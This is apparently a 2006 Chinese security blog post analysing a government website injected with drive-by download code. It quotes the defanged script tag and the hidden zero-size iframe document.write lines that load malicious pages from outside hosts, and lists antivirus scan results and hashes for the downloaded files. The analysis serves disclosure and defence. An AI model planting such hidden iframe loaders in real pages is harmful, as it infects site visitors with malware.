本文详细记录了一个政府网站被植入恶意代码的过程。攻击者通过复杂的链接跳转和iframe标签加载恶意文件,包括被标记为Trojan-Downloader.JS.Agent.h的nt.htm及含有潜在木马的xxxxx.pif文件。
endurer 原创
*2006.02.11 第3版 江民KV2006将xxxxx.pif报为Backdoor/Huigezi.arz
*2006.02.09 第2版 瑞星2006将xxxxx.pif报为Backdoor.Gpigeon.adg(18.09.21版本加入)
*2006.01.05 第1版
今天在浏览前几天刚发现的那个被加了被加入自动下载病毒文件的代码的政府网站时( 详见: 某政府网站被加入自动下载病毒文件的代码(第2版) ),发现其中自动下载病毒文件的代码变了,转了一次弯。
首先是使用:
〈script src=hxxp://www.****5166.com/tour/Check.js></script〉
来引入文件Check.js。
而这个Check.js的内容为:
document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");
浏览器在打开
hxxp://www.***csedu.gov.cn/workOA/good/index.htm
时会自动转到
hxxp://www.***csedu.gov.cn/workOA/good/nt.htm
(nt.htm被Kaspersky将报为Trojan-Downloader.JS.Agent.h)。
浏览器在打开nt.htm时则会自动下载:
1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif
http://virusscan.jotti.org/扫描的结果:
| File: | mmmmm.gif |
| Status: |
INFECTED/MALWARE
|
| MD5 | ac49ef4f23c35cdd5830fb691890ef47 |
| Packers detected: |
-
|
|
Scanner results
| |
| AntiVir |
Found nothing
|
| ArcaVir |
Found nothing
|
| Avast |
Found nothing
|
| AVG Antivirus |
Found nothing
|
| BitDefender |
Found nothing
|
| ClamAV |
Found nothing
|
| Dr.Web |
Found
Trojan.DownLoader.5583
|
| F-Prot Antivirus |
Found nothing
|
| Fortinet |
Found nothing
|
| Kaspersky Anti-Virus |
Found
Exploit.JS.Phel.m
|
| NOD32 |
Found nothing
|
| Norman Virus Control |
Found nothing
|
| UNA |
Found nothing
|
| VBA32 |
Found nothing
|
2。hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif
*2006.02.09补充 瑞星2006将xxxxx.pif报为Backdoor.Gpigeon.adg(18.09.21版本加入)
*2006.02.11补充 江民KV2006将xxxxx.pif报为Backdoor/Huigezi.arz
http://virusscan.jotti.org/扫描的结果:
| File: | xxxxx.pif |
| Status: |
POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
|
| MD5 | 286fd19874a5558a479187c253a4909f |
| Packers detected: |
-
|
|
Scanner results
| |
| AntiVir |
Found
Heuristic/Trojan.PwdStealer (probable variant)
|
| ArcaVir |
Found nothing
|
| Avast |
Found nothing
|
| AVG Antivirus |
Found nothing
|
| BitDefender |
Found nothing
|
| ClamAV |
Found nothing
|
| Dr.Web |
Found nothing
|
| F-Prot Antivirus |
Found nothing
|
| Fortinet |
Found nothing
|
| Kaspersky Anti-Virus |
Found nothing
|
| NOD32 |
Found
probably a variant of Win32/Hupigon (probable variant)
|
| Norman Virus Control |
Found nothing
|
| UNA |
Found nothing
|
| VBA32 |
Found nothing
|
3。hxxp://***.****xuemulove.com/a.gif(可能已不存在,未能获取)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
